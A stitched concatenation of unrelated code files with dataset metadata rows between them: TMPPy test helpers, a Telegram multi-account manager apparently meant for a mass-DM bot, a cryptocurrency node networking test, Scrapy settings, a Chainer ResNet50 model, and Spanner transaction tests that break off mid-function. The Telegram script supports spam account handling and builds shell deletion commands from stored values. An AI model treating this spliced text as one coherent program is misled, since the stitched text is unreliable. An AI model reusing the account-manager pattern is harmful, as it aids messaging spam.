header = optimize_ir0.optimize_header(header, identifier_generator, verbose=False)
cpp_source = ir0_to_cpp.header_to_cpp(header, identifier_generator)
cpp_source = utils.clang_format(cpp_source)
return module_ir2, module_ir1, cpp_source
except ast_to_ir3.CompilationError as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The conversion from TMPPy to C++ failed.
stderr was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
error_message=e.args[0]),
pytrace=False)
def assert_compilation_succeeds(extra_cpp_prelude=''):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_success(tmppy_source, module_ir2, module_ir1, extra_cpp_prelude + cpp_source)
return wrapper
return eval
def assert_code_optimizes_to(expected_cpp_source: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
assert expected_cpp_source[0] == '\n'
if cpp_source != expected_cpp_source[1:]:
pytest.fail(
textwrap.dedent('''\
The generated code didn't match the expected code.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
Generated C++ source:
{cpp_source}
Expected C++ source:
{expected_cpp_source}
Diff:
{cpp_source_diff}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cpp_source=str(cpp_source),
expected_cpp_source=str(expected_cpp_source[1:]),
cpp_source_diff=''.join(difflib.unified_diff(expected_cpp_source[1:].splitlines(True),
cpp_source.splitlines(True),
fromfile='expected.h',
tofile='actual.h'))),
pytrace=False)
return wrapper
return eval
def assert_compilation_fails(expected_py2tmp_error_regex: str, expected_py2tmp_error_desc_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_compile_error(
expected_py2tmp_error_regex,
expected_py2tmp_error_desc_regex,
tmppy_source,
module_ir2,
module_ir1,
cpp_source)
return wrapper
return eval
# TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test).
def assert_compilation_fails_with_generic_error(expected_error_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_generic_compile_error(
expected_error_regex,
tmppy_source,
module_ir2,
module_ir1,
cpp_source)
return wrapper
return eval
# TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test).
def assert_compilation_fails_with_static_assert_error(expected_error_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_generic_compile_error(
r'(error: static assertion failed: |error: static_assert failed .)' + expected_error_regex,
tmppy_source,
module_ir2,
module_ir1,
cpp_source)
return wrapper
return eval
def _split_list(l, num_elems_in_chunk):
args = [iter(l)] * num_elems_in_chunk
return list(itertools.zip_longest(*args))
def _get_line_from_diagnostic(diagnostic):
matches = re.match('<unknown>:([0-9]*):', diagnostic)
return int(matches.group(1))
def assert_conversion_fails(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
actual_source_lines = []
expected_error_regex = None
expected_error_line = None
expected_note_by_line = dict()
for line_index, line in enumerate(tmppy_source.splitlines()):
error_regex_marker = ' # error: '
note_regex_marker = ' # note: '
if error_regex_marker in line:
if expected_error_regex:
pytest.fail('Multiple expected errors in the same test are not supported', pytrace=False)
[line, expected_error_regex] = line.split(error_regex_marker)
expected_error_line = line_index + 1
elif note_regex_marker in line:
[line, expected_note_regex] = line.split(note_regex_marker)
expected_note_by_line[line_index + 1] = expected_note_regex
actual_source_lines.append(line)
if not expected_error_regex:
pytest.fail(
textwrap.dedent('''\
assert_conversion_fails was used, but no expected error regex was found.
TMPPy source:
{tmppy_source}
''').format(tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
try:
module_ir2, module_ir1 = _convert_tmppy_source_to_ir('\n'.join(actual_source_lines), create_identifier_generator())
e = None
except ast_to_ir3.CompilationError as e1:
e = e1
if not e:
pytest.fail(
textwrap.dedent('''\
Expected an exception, but the _py2tmp conversion completed successfully.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1)),
pytrace=False)
# py2tmp diagnostics take up 3 lines each, e.g.:
# <unknown>:2:11: error: Empty lists are not currently supported.
# return []
# ^
py2tmp_diagnostics = _split_list(e.args[0].splitlines(), num_elems_in_chunk=3)
error_diagnostic = py2tmp_diagnostics[0]
expected_error_regex = '<unknown>:[0-9]*:[0-9]*: error: ' + expected_error_regex
if not re.match(expected_error_regex, error_diagnostic[0]):
pytest.fail(
textwrap.dedent('''\
An exception was thrown, but it didn\'t match the expected error regex.
Expected error regex: {expected_error_regex}
Actual error:
{actual_error}
TMPPy source:
{tmppy_source}
''').format(expected_error_regex = expected_error_regex,
actual_error = '\n'.join(error_diagnostic),
tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
matches = re.match('<unknown>:([0-9]*):', error_diagnostic[0])
actual_error_line = int(matches.group(1))
if expected_error_line != actual_error_line:
pytest.fail(
textwrap.dedent('''\
An exception matching the expected regex was thrown, but the error mentioned the wrong line: {actual_error_line} was reported instead of {expected_error_line}
Expected error regex: {expected_error_regex}
Actual error:
{actual_error}
TMPPy source:
{tmppy_source}
''').format(actual_error_line=actual_error_line,
expected_error_line=expected_error_line,
expected_error_regex = expected_error_regex,
actual_error = '\n'.join(error_diagnostic),
tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
actual_note_by_line = {_get_line_from_diagnostic(note[0]): note
for note in py2tmp_diagnostics[1:]}
for expected_note_line, expected_note_regex in expected_note_by_line.items():
actual_note = actual_note_by_line.get(expected_note_line)
if not actual_note:
raise Exception('Expected the note %s on line %s but no note was emitted mentioning this line. Emitted notes: %s' % (
expected_note_regex, expected_note_line, json.dumps(actual_note_by_line, indent=4)))
expected_note_regex = '<unknown>:[0-9]*:[0-9]*: note: ' + expected_note_regex
if not re.match(expected_note_regex, actual_note[0]):
pytest.fail(
textwrap.dedent('''\
A note diagnostic was emitted, but it didn\'t match the expected note regex.
Expected note regex: {expected_note_regex}
Actual note:
{actual_note}
TMPPy source:
{tmppy_source}
''').format(expected_note_regex = expected_note_regex,
actual_note = '\n'.join(actual_note),
tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
for actual_note_line, actual_note in actual_note_by_line.items():
expected_note = expected_note_by_line.get(actual_note_line)
if not expected_note:
pytest.fail(
textwrap.dedent('''\
Unexpected note:
{actual_note}
TMPPy source:
{tmppy_source}
''').format(actual_note = '\n'.join(actual_note),
tmppy_source = add_line_numbers(tmppy_source),
pytrace=False))
return wrapper
def assert_conversion_fails_with_codegen_error(expected_error_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
try:
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
e = None
except ir0.CodegenError as e1:
e = e1
if not e:
pytest.fail(
textwrap.dedent('''\
Expected a codegen error, but the _py2tmp conversion completed successfully.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir2}
C++ source:
{cpp_source}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cpp_source=add_line_numbers(cpp_source)),
pytrace=False)
if not re.match(expected_error_regex, e.args[0]):
pytest.fail(
textwrap.dedent('''\
A codegen error was emitted as expected, but it didn\'t match the expected note regex.
Expected error regex: {expected_error_regex}
Actual error:
{actual_error}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source:
{cpp_source}
''').format(expected_error_regex = expected_error_regex,
actual_error = e.args[0],
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cpp_source=add_line_numbers(cpp_source)),
pytrace=False)
return wrapper
return eval
# Note: this is not the main function of this file, it's meant to be used as main function from test_*.py files.
def main(file):
code = pytest.main(args = sys.argv + [os.path.realpath(file)])
exit(code)
| 41.699195 | 202 | 0.547806 | [
"Apache-2.0"
] | DalavanCloud/tmppy | _py2tmp/testing/utils.py | 41,449 | Python |
import requests
from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, pyfiglet
from colorama import init, Fore
import os, random
from time import sleep
init()
lg = Fore.LIGHTGREEN_EX
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
r = Fore.RED
n = Fore.RESET
colors = [lg, r, w, cy, ye]
def banner():
f = pyfiglet.Figlet(font='slant')
banner = f.renderText('Telegram')
print(f'{random.choice(colors)}{banner}{n}')
print(r+' Version: 1 | Author: Shabani'+n+'\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
#print(r)
banner()
#print(n)
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] List out all the accounts'+n)
print(lg+'[4] Delete specific accounts'+n)
#print(lg+'[5] Update your Genisys'+n)
print(lg+'[5] Quit')
a = int(input(f'\nEnter your choice: {r}'))
if a == 1:
with open('vars.txt', 'ab') as g:
newly_added = []
while True:
a = int(input(f'\n{lg}Enter API ID: {r}'))
b = str(input(f'{lg}Enter API Hash: {r}'))
c = str(input(f'{lg}Enter Phone Number: {r}'))
p = ''.join(c.split())
pickle.dump([a, b, p], g)
newly_added.append([a, b, p])
ab = input(f'\nDo you want to add more accounts?[y/n]: ')
if 'y' in ab:
pass
else:
print('\n'+lg+'[i] Saved all accounts in vars.txt'+n)
g.close()
sleep(3)
clr()
print(lg + '[*] Logging in from new accounts...\n')
for added in newly_added:
c = TelegramClient(f'sessions/{added[2]}', added[0], added[1])
try:
c.start()
print(f'n\n{lg}[+] Logged in - {added[2]}')
c.disconnect()
except PhoneNumberBannedError:
print(f'{r}[!] {added[2]} is banned! Filter it using option 2')
continue
print('\n')
input(f'\n{lg}Press enter to goto main menu...')
break
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
api_id = int(account[0])
api_hash = str(account[1])
phone = str(account[2])
client = TelegramClient(f'sessions\\{phone}', api_id, api_hash)
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
client.sign_in(phone, input('[+] Enter the code: '))
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Id = a[0]
Hash = a[1]
Phone = a[2]
pickle.dump([Id, Hash, Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu')
elif a == 3:
display = []
j = open('vars.txt', 'rb')
while True:
try:
display.append(pickle.load(j))
except EOFError:
break
j.close()
print(f'\n{lg}')
print(f'API ID | API Hash | Phone')
print(f'==========================================================')
i = 0
for z in display:
print(f'{z[0]} | {z[1]} | {z[2]}')
i += 1
print(f'==========================================================')
input('\nPress enter to goto main menu')
elif a == 4:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[2]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][2])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'{lg}Press enter to goto main menu{n}')
f.close()
elif a == 5:
clr()
banner()
quit() | 34.244048 | 91 | 0.441161 | [
"MIT"
] | DenizShabani/TelegramMassDMBot | manager.py | 5,753 | Python |
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Vadercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, MSG_BLOCK, msg_getdata, msg_verack, NODE_NETWORK_LIMITED, NODE_WITNESS
from test_framework.p2p import P2PInterface
from test_framework.test_framework import VadercoinTestFramework
from test_framework.util import (
assert_equal,
)
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
self.wait_until(test_function, timeout=timeout)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(MSG_BLOCK, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(VadercoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-prune=550', '-addrmantest'], [], []]
def disconnect_all(self):
self.disconnect_nodes(0, 1)
self.disconnect_nodes(0, 2)
self.disconnect_nodes(1, 2)
def setup_network(self):
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
expected_services = NODE_WITNESS | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
self.connect_nodes(0, 1)
blocks = self.nodes[1].generatetoaddress(292, self.nodes[1].get_deterministic_priv_key().address)
self.sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrieve block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
assert_equal(node1.firstAddrnServices, expected_services)
self.nodes[0].disconnect_p2ps()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
self.connect_nodes(0, 2)
try:
self.sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
# node2 must remain at height 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
self.connect_nodes(1, 2)
# sync must be possible
self.sync_blocks()
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generatetoaddress(10, self.nodes[0].get_deterministic_priv_key().address)
# connect node1 (non pruned) with node0 (pruned) and check if the can sync
self.connect_nodes(0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
self.sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
| 40.587719 | 121 | 0.694619 | [
"MIT"
] | VaderCoinProject/vadercoin | test/functional/p2p_node_network_limited.py | 4,627 | Python |
# -*- coding: utf-8 -*-
BOT_NAME = 'BeiKeZuFangSpider'
SPIDER_MODULES = ['BeiKeZuFangSpider.spiders']
NEWSPIDER_MODULE = 'BeiKeZuFangSpider.spiders'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
# COOKIES_ENABLED = False
# KAFKA配置
# KAFKA的访问ip或者端口(默认localhost:9092)
KAFKA_IP_PORT = ["localhost:9092"]
# Kafka的Topic name
KAFKA_TOPIC_NAME = "BeiKeZuFang"
# MONGODB配置
MONGODB_HOST = "127.0.0.1"
MONGODB_PORT = 27017
MONGODB_USER = ""
MONGODB_PASS = ""
MONGODB_DB_NAME = "BeiKeData"
MONGODB_COL_NAME = "ZuFang"
# CSV导出
CSV_EXPORTER = True
CSV_DEFAULT_PATH = "./ExportData/"
# Disable Telnet Console (enabled by default)
TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'BeiKeZuFangSpider.middlewares.BeikezufangspiderSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
'scrapy.downloadermiddleware.useragent.UserAgentMiddleware': None,
'BeiKeZuFangSpider.middlewares.BeiKeZuFangScrapyUserAgentMiddleware': 400,
}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'BeiKeZuFangSpider.pipelines.BeiKeZuFangSpiderPipeline': 1,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 32.041667 | 102 | 0.776983 | [
"MIT"
] | sunhailin-Leo/BeiKeZuFangSpider | BeiKeZuFangSpider/settings.py | 3,112 | Python |
# Original author: yasunorikudo
# (https://github.com/yasunorikudo/chainer-ResNet)
import chainer
import chainer.functions as F
from chainer import initializers
import chainer.links as L
class BottleNeckA(chainer.Chain):
def __init__(self, in_size, ch, out_size, stride=2):
super(BottleNeckA, self).__init__()
initialW = initializers.HeNormal()
with self.init_scope():
self.conv1 = L.Convolution2D(
in_size, ch, 1, stride, 0, initialW=initialW, nobias=True)
self.bn1 = L.BatchNormalization(ch)
self.conv2 = L.Convolution2D(
ch, ch, 3, 1, 1, initialW=initialW, nobias=True)
self.bn2 = L.BatchNormalization(ch)
self.conv3 = L.Convolution2D(
ch, out_size, 1, 1, 0, initialW=initialW, nobias=True)
self.bn3 = L.BatchNormalization(out_size)
self.conv4 = L.Convolution2D(
in_size, out_size, 1, stride, 0,
initialW=initialW, nobias=True)
self.bn4 = L.BatchNormalization(out_size)
def __call__(self, x):
h1 = F.relu(self.bn1(self.conv1(x)))
h1 = F.relu(self.bn2(self.conv2(h1)))
h1 = self.bn3(self.conv3(h1))
h2 = self.bn4(self.conv4(x))
return F.relu(h1 + h2)
class BottleNeckB(chainer.Chain):
def __init__(self, in_size, ch):
super(BottleNeckB, self).__init__()
initialW = initializers.HeNormal()
with self.init_scope():
self.conv1 = L.Convolution2D(
in_size, ch, 1, 1, 0, initialW=initialW, nobias=True)
self.bn1 = L.BatchNormalization(ch)
self.conv2 = L.Convolution2D(
ch, ch, 3, 1, 1, initialW=initialW, nobias=True)
self.bn2 = L.BatchNormalization(ch)
self.conv3 = L.Convolution2D(
ch, in_size, 1, 1, 0, initialW=initialW, nobias=True)
self.bn3 = L.BatchNormalization(in_size)
def __call__(self, x):
h = F.relu(self.bn1(self.conv1(x)))
h = F.relu(self.bn2(self.conv2(h)))
h = self.bn3(self.conv3(h))
return F.relu(h + x)
class Block(chainer.ChainList):
def __init__(self, layer, in_size, ch, out_size, stride=2):
super(Block, self).__init__()
self.add_link(BottleNeckA(in_size, ch, out_size, stride))
for i in range(layer - 1):
self.add_link(BottleNeckB(out_size, ch))
self._layer = layer
def __call__(self, x):
for f in self.children():
x = f(x)
return x
@property
def layer(self):
return self._layer
class ResNet50(chainer.Chain):
def __init__(self, class_num, insize, class_weight=None, caffemodel_path=None):
assert (insize % 32 == 0), "'insize' should be divisible by 32."
super(ResNet50, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D(
3, 64, 7, 2, 3, initialW=initializers.HeNormal())
self.bn1 = L.BatchNormalization(64)
self.res2 = Block(3, 64, 64, 256, 1)
self.res3 = Block(4, 256, 128, 512)
self.res4 = Block(6, 512, 256, 1024)
self.res5 = Block(3, 1024, 512, 2048)
self.fc = L.Linear(2048, class_num)
if caffemodel_path is not None:
# Load pre-trained weights from caffemodel
self._load_pretrained_weights(caffemodel_path)
self._class_num = class_num
self._insize = insize
self._class_weight = class_weight
def forward(self, x, compute_cam=False):
h = self.bn1(self.conv1(x))
h = F.max_pooling_2d(F.relu(h), 3, stride=2)
h = self.res2(h)
h = self.res3(h)
h = self.res4(h)
h = self.res5(h)
cam_features = h.data
h = F.average_pooling_2d(h, self._insize//32, stride=1)
h = self.fc(h)
if compute_cam:
cam_weights = self.fc.W.data
return h, cam_features, cam_weights
return h
def __call__(self, x, t):
h = self.forward(x)
loss = F.softmax_cross_entropy(h, t, class_weight=self._class_weight)
chainer.report({'loss': loss, 'accuracy': F.accuracy(h, t)}, self)
return loss
@property
def insize(self):
return self._insize
@property
def class_num(self):
return self._class_num
# Functions to load weights from pre-trained ResNet50 caffemodel
# Reference: https://github.com/chainer/chainer/blob/master/chainer/links/model/vision/resnet.py
def _load_weights_conv_bn(self, src, dst_conv, dst_bn, bname, cname):
src_conv = getattr(src, 'res{}_branch{}'.format(bname, cname))
src_bn = getattr(src, 'bn{}_branch{}'.format(bname, cname))
src_scale = getattr(src, 'scale{}_branch{}'.format(bname, cname))
dst_conv.W.data[:] = src_conv.W.data
dst_bn.avg_mean[:] = src_bn.avg_mean
dst_bn.avg_var[:] = src_bn.avg_var
dst_bn.gamma.data[:] = src_scale.W.data
dst_bn.beta.data[:] = src_scale.bias.b.data
def _load_weights_bottleneckA(self, dst, src, name):
self._load_weights_conv_bn(src, dst.conv1, dst.bn1, name, '2a')
self._load_weights_conv_bn(src, dst.conv2, dst.bn2, name, '2b')
self._load_weights_conv_bn(src, dst.conv3, dst.bn3, name, '2c')
self._load_weights_conv_bn(src, dst.conv4, dst.bn4, name, '1')
def _load_weights_bottleneckB(self, dst, src, name):
self._load_weights_conv_bn(src, dst.conv1, dst.bn1, name, '2a')
self._load_weights_conv_bn(src, dst.conv2, dst.bn2, name, '2b')
self._load_weights_conv_bn(src, dst.conv3, dst.bn3, name, '2c')
def _load_weights_block(self, dst, src, names):
for i, (layers, name) in enumerate(zip(dst.children(), names)):
if i ==0:
self._load_weights_bottleneckA(layers, src, name)
else:
self._load_weights_bottleneckB(layers, src, name)
def _load_pretrained_weights(self, caffemodel_path):
# As CaffeFunction uses shortcut symbols,
# CaffeFunction is imported here.
from chainer.links.caffe.caffe_function import CaffeFunction
src = CaffeFunction(caffemodel_path)
self.conv1.W.data[:] = src.conv1.W.data
self.conv1.b.data[:] = src.conv1.b.data
self.bn1.avg_mean[:] = src.bn_conv1.avg_mean
self.bn1.avg_var[:] = src.bn_conv1.avg_var
self.bn1.gamma.data[:] = src.scale_conv1.W.data
self.bn1.beta.data[:] = src.scale_conv1.bias.b.data
self._load_weights_block(self.res2, src, ['2a', '2b', '2c'])
self._load_weights_block(self.res3, src, ['3a', '3b', '3c', '3d'])
self._load_weights_block(self.res4, src, ['4a', '4b', '4c', '4d', '4e', '4f'])
self._load_weights_block(self.res5, src, ['5a', '5b', '5c'])
| 31.684211 | 97 | 0.697674 | [
"MIT"
] | motokimura/cowc_car_counting | src/models/resnet50.py | 6,020 | Python |
# Copyright 2021 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import pickle
import pytest
from google.cloud import spanner_v1
from google.cloud.spanner_dbapi.connection import Connection
from . import _helpers
DATABASE_NAME = "dbapi-txn"
DDL_STATEMENTS = (
"""CREATE TABLE contacts (
contact_id INT64,
first_name STRING(1024),
last_name STRING(1024),
email STRING(1024)
)
PRIMARY KEY (contact_id)""",
)
@pytest.fixture(scope="session")
def raw_database(shared_instance, database_operation_timeout):
databse_id = _helpers.unique_id("dbapi-txn")
pool = spanner_v1.BurstyPool(labels={"testcase": "database_api"})
database = shared_instance.database(
databse_id, ddl_statements=DDL_STATEMENTS, pool=pool,
)
op = database.create()
op.result(database_operation_timeout) # raises on failure / timeout.
yield database
database.drop()
def clear_table(transaction):
transaction.execute_update("DELETE FROM contacts WHERE true")
@pytest.fixture(scope="function")
def dbapi_database(raw_database):
raw_database.run_in_transaction(clear_table)
yield raw_database
raw_database.run_in_transaction(clear_table)
def test_commit(shared_instance, dbapi_database):
"""Test committing a transaction with several statements."""
want_row = (
1,
"updated-first-name",
"last-name",
"[email protected]",
)
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
# execute several DML statements within one transaction
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (1, 'first-name', 'last-name', '[email protected]')
"""
)
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
cursor.execute(
"""
UPDATE contacts
SET email = '[email protected]'
WHERE email = '[email protected]'
"""
)
conn.commit()
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
conn.commit()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_rollback(shared_instance, dbapi_database):
"""Test rollbacking a transaction with several statements."""
want_row = (2, "first-name", "last-name", "[email protected]")
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (2, 'first-name', 'last-name', '[email protected]')
"""
)
conn.commit()
# execute several DMLs with one transaction
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
cursor.execute(
"""
UPDATE contacts
SET email = '[email protected]'
WHERE email = '[email protected]'
"""
)
conn.rollback()
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
conn.commit()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_autocommit_mode_change(shared_instance, dbapi_database):
"""Test auto committing a transaction on `autocommit` mode change."""
want_row = (
2,
"updated-first-name",
"last-name",
"[email protected]",
)
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (2, 'first-name', 'last-name', '[email protected]')
"""
)
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
conn.autocommit = True
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_rollback_on_connection_closing(shared_instance, dbapi_database):
"""
When closing a connection all the pending transactions
must be rollbacked. Testing if it's working this way.
"""
want_row = (1, "first-name", "last-name", "[email protected]")
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
